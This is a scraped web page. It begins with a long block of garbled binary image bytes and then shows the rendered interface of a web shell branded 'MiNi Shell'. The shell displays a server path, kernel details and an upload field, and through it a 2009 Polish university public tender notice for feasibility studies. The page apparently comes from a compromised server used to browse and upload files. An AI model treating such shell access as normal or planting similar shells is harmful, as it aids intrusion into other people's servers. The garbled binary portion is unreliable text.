JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20091020/183133-N-2009.html

<p class="kh_header"><b>Zielona Góra: OPRACOWANIE STUDIÓW WYKONALNOŚCI ORAZ WYKONANIE USŁUG DODATKOWYCH DLA PRZEDSIĘWZIĘĆ INWESTYCYJNYCH UNIWERSYTETU ZIELONOGÓRSKIEGO</b><br>
<b>Numer ogłoszenia: 183133 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Zielonogórski Dział Inwestycji , ul. Licealna 9, 65-417 Zielona Góra, woj. lubuskie, tel. 068 3282434, 3282369, faks 068 3282369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uz.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE STUDIÓW WYKONALNOŚCI ORAZ WYKONANIE USŁUG DODATKOWYCH DLA PRZEDSIĘWZIĘĆ INWESTYCYJNYCH UNIWERSYTETU ZIELONOGÓRSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPRACOWANIE STUDIÓW WYKONALNOŚCI ORAZ WYKONANIE USŁUG DODATKOWYCH DLA PRZEDSIĘWZIĘĆ INWESTYCYJNYCH UNIWERSYTETU ZIELONOGÓRSKIEGO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9, 71.31.34.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu w zakresie części 1
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (tekst jednolity - Dz. U. z 2007 r., Nr 223, poz. 1655 z p. zm.) oraz spełniają warunki określone w art. 22 ust. 1 ustawy i w niniejszej Specyfikacji.
2.	Wykonawca musi wykazać się udokumentowanym doświadczeniem - do przetargu mogą przystępować Wykonawcy, którzy w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) wykonali co najmniej dwa opracowania Studium Wykonalności  dla Projektów dotyczących budowy obiektów użyteczności publicznej  i/lub dydaktycznych wraz z dokumentacją związaną z przeprowadzeniem procedury oceny oddziaływania na środowisko dla projektów finansowanych z funduszy Unii Europejskiej, napisaniem wniosku o dofinansowanie tych inwestycji  wraz z wszelkimi niezbędnymi załącznikami. Łączna wartość kosztorysowa tych Projektów ma być nie mniejsza niż 10 mln zł. Wykonawca winien udokumentować, że dokumenty te zostały przyjęte jako właściwe przez odpowiednią Instytucję Zarządzającą.
Fakt ten należy udokumentować wykazem (na załączniku nr 5 do SIWZ) i dokumentami potwierdzającymi należyte wykonanie usług.
3.	Wykonawca musi wykazać się wykonaniem, co najmniej jednej analizy występowania pomocy publicznej zgodnie z art. 87 ust. 1 Traktatu Ustanawiającego Wspólnotę Europejską (TWE).  
Fakt ten należy udokumentować wykazem (na załączniku nr 5a do SIWZ) i dokumentami potwierdzającymi należyte wykonanie usługi.

W przypadku ubiegania się o udzielenie zamówienia przez podmioty występujące wspólnie warunki określone w pkt VIIa ppkt 2, 3 mogą być spełnione łącznie przez te podmioty.
Warunki udziału w postępowaniu w zakresie części 2
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (tekst jednolity - Dz. U. z 2007 r., Nr 223, poz. 1655 z p. zm.) oraz spełniają warunki określone w art. 22 ust. 1 ustawy i w niniejszej Specyfikacji.
2.	Wykonawca musi wykazać się udokumentowanym doświadczeniem - do przetargu mogą przystępować Wykonawcy, którzy w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) wykonali co najmniej cztery opracowania Studium Wykonalności  dla Projektów dotyczących budowy obiektów użyteczności publicznej  i/lub przemysłowych i w tym co najmniej jedno opracowanie dla obiektów  badawczo - rozwojowych  wraz z dokumentacją związaną z przeprowadzeniem procedury oceny oddziaływania na środowisko dla projektów finansowanych z funduszy Unii Europejskiej, napisaniem wniosku o dofinansowanie tych inwestycji  wraz z wszelkimi niezbędnymi załącznikami. Łączna wartość kosztorysowa tych Projektów ma być nie mniejsza niż 40 mln zł. Wykonawca winien udokumentować, że dokumenty te zostały przyjęte jako właściwe przez odpowiednią Instytucję Zarządzającą  
Fakt ten należy udokumentować wykazem (na załączniku nr 6 do SIWZ) i dokumentami potwierdzającymi należyte wykonanie usług.
3.	Wykonawca musi wykazać się wykonaniem, co najmniej jednej analizy występowania pomocy publicznej zgodnie z art. 87 ust. 1 Traktatu Ustanawiającego Wspólnotę Europejską (TWE).  
Fakt ten należy udokumentować wykazem (na załączniku nr 6a do SIWZ) i dokumentami potwierdzającymi należyte wykonanie usługi.

W przypadku ubiegania się o udzielenie zamówienia przez podmioty występujące wspólnie warunki określone w pkt VIIb ppkt 2, 3 mogą być spełnione łącznie przez te podmioty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2.	Wypełnione Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych oraz spełnia warunki określone w art. 22 ust. 1 ustawy i w niniejszej Specyfikacji - stanowiące załącznik nr 3 do niniejszej SIWZ.
3.	Wypełniony wykaz wykonanych usług 
w zakresie części 1 
-	Doświadczenie Wykonawcy (załącznik nr 5 Specyfikacji) - potwierdzający spełnienie warunku określonego w pkt VIIa  ppkt 2 niniejszej SIWZ.
-	Doświadczenie Wykonawcy (załącznik nr 5a Specyfikacji) - potwierdzający spełnienie warunku określonego w pkt VIIa  ppkt 3 niniejszej SIWZ.
w zakresie części 2
-	Doświadczenie Wykonawcy (załącznik nr 6 Specyfikacji) - potwierdzający spełnienie warunku określonego w pkt VIIb ppkt 2 niniejszej SIWZ.
-	Doświadczenie Wykonawcy (załącznik nr 6a Specyfikacji) - potwierdzający spełnienie warunku określonego w pkt VIIb ppkt 3 niniejszej SIWZ.
4.	Dokumenty potwierdzające, że usługi, które Wykonawca wpisze w załącznikach:
-	nr 5 i 5a w zakresie części 1,
-	nr 6 i 6a w zakresie części 2
Doświadczenie Wykonawcy, zostały wykonane należycie.
Ponadto do oferty należy dołączyć:
5.	Wypełniony formularz OFERTA stanowiący załącznik nr 2 do niniejszej SIWZ;
6.	Dowód wniesienia wadium (jeśli dotyczy)
7.	O ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą należy dołączyć do oferty stosowne pełnomocnictwo. W przypadku Wykonawców wspólnie ubiegających się o zamówienie pełnomocnictwo winno być udzielone przez wszystkich tych Wykonawców. Pełnomocnictwo do reprezentowania Wykonawców składających ofertę wspólną winno zawierać:
a)	wyszczególnienie wszystkich Wykonawców składających ofertę wspólną (nazwy,   adresy, Regon i NIP), 
b)	 wskazanie pełnomocnika,
c)	dokładne określenie postępowania dla którego udzielane jest pełnomocnictwo,
d)	określenie czasu trwania pełnomocnictwa (jeśli okres udzielenia pełnomocnictwa jest krótszy niż do dnia upływu okresu odpowiedzialności z tytułu udzielonej gwarancji  oraz usunięcia usterek pogwarancyjnych to pełnomocnictwo to będzie musiało być następnie wydłużone do tego okresu np. w umowie jaką zawrą podmioty po wyborze ich oferty).
e)	Zakres pełnomocnictwa: pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy.
UWAGA!!!
a)	Jeśli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w §1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U.  nr 87 poz. 605) - jeśli Zamawiający żąda powyżej któregoś z tych dokumentów - może złożyć odpowiednio dokumenty, o których mowa w § 2 tego Rozporządzenia.
b)	Jeśli Zamawiający żąda dokumentów, o których mowa w § 3 ust. 1 pkt 2-4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 87/2006, poz.605) Wykonawca może złożyć zamiast nich zaświadczenia, o których mowa odpowiednio w § 3 ust. 2 i 3 tegoż rozporządzenia.
c)	W przypadku gdy ofertę składa wspólnie kilku Wykonawców, wszyscy Wykonawcy muszą być uprawnieni do przystąpienia do realizacji umowy - wszystkie wymagane dokumenty i oświadczenia muszą być złożone przez każdego z tych Wykonawców (chyba, że dotyczą warunków, które mogą być spełnione łącznie przez te podmioty)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uz.zgora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Zielonogórski Dział Inwestycji, ul. Szafrana 21, pokój 1, 65-516 Zielona Góra.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2009 godzina 11:00, miejsce: Uniwersytet Zielonogórski, Kancelaria Ogólna, ul. Licealna 9, 65-417 Zielona Góra.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane z Lubuskiego Regionalnego Programu Operacyjnego.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie Studium wykonalności oraz wykonanie usług dodatkowych dla przedsięwzięcia pn. Budowa Biblioteki Uniwersytetu Zielonogórskiego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Studium wykonalności oraz wykonanie usług dodatkowych dla przedsięwzięcia pn. Budowa Biblioteki Uniwersytetu Zielonogórskiego
Przedmiotem zamówienia jest wykonanie opracowań:
-	Studiów Wykonalności 
-	dokumentacji związanej z przeprowadzeniem procedury oceny oddziaływania na środowisko 
-	napisanie wniosku o dofinansowanie projektu wraz ze wszelkimi wymaganymi załącznikami 
-	przeprowadzenie analizy występowania pomocy publicznej w projekcie 
zgodnie z wytycznymi odpowiedniego działania LRPO, dla projektów (odrębnie dla każdego) przewidzianych do aplikowania o wsparcie, w ramach Indykatywnego Planu Inwestycyjnego,  ze środków w ramach   Europejskiego Funduszu Rozwoju Regionalnego - Lubuskiego Regionalnego Programu Operacyjnego (zwanego LRPO)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9, 71.31.34.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie Studiów Wykonalności oraz wykonanie usług dodatkowych dla przedsięwzięć inwestycyjnych Uniwersytetu Zielonogórskiego dla następujących zadań:
1)	Przebudowa budynku willi na potrzeby Centrum Logistycznego PNT i  Platformy na rzecz Nauki i Gospodarki
2)	Budowa budynku Centrum Budownictwa Zrównoważonego i Energii
3)	Budowa budynku Centrum Innowacji Technologie dla Zdrowia  Człowieka
4)	Budowa budynku Centrum Technologii Informatycznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Studiów Wykonalności oraz wykonanie usług dodatkowych dla przedsięwzięć inwestycyjnych Uniwersytetu Zielonogórskiego dla następujących zadań:
1)	Przebudowa budynku willi na potrzeby Centrum Logistycznego PNT i Platformy   na rzecz Nauki i Gospodarki
2)	Budowa budynku Centrum Budownictwa Zrównoważonego i Energii
3)	Budowa budynku Centrum Innowacji Technologie dla Zdrowia  Człowieka
4)	Budowa budynku Centrum Technologii Informatycznych
Przedmiotem zamówienia jest wykonanie opracowań:
-	Studiów Wykonalności 
-	dokumentacji związanej z przeprowadzeniem procedury oceny oddziaływania na środowisko 
-	napisanie wniosku o dofinansowanie projektu wraz ze wszelkimi wymaganymi załącznikami 
-	przeprowadzenie analizy występowania pomocy publicznej w projekcie 
zgodnie z wytycznymi odpowiedniego działania LRPO, dla projektów (odrębnie dla każdego) przewidzianych do aplikowania o wsparcie, w ramach Indykatywnego Planu Inwestycyjnego,  ze środków w ramach   Europejskiego Funduszu Rozwoju Regionalnego - Lubuskiego Regionalnego Programu Operacyjnego (zwanego LRPO)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9, 71.31.34.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.10.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com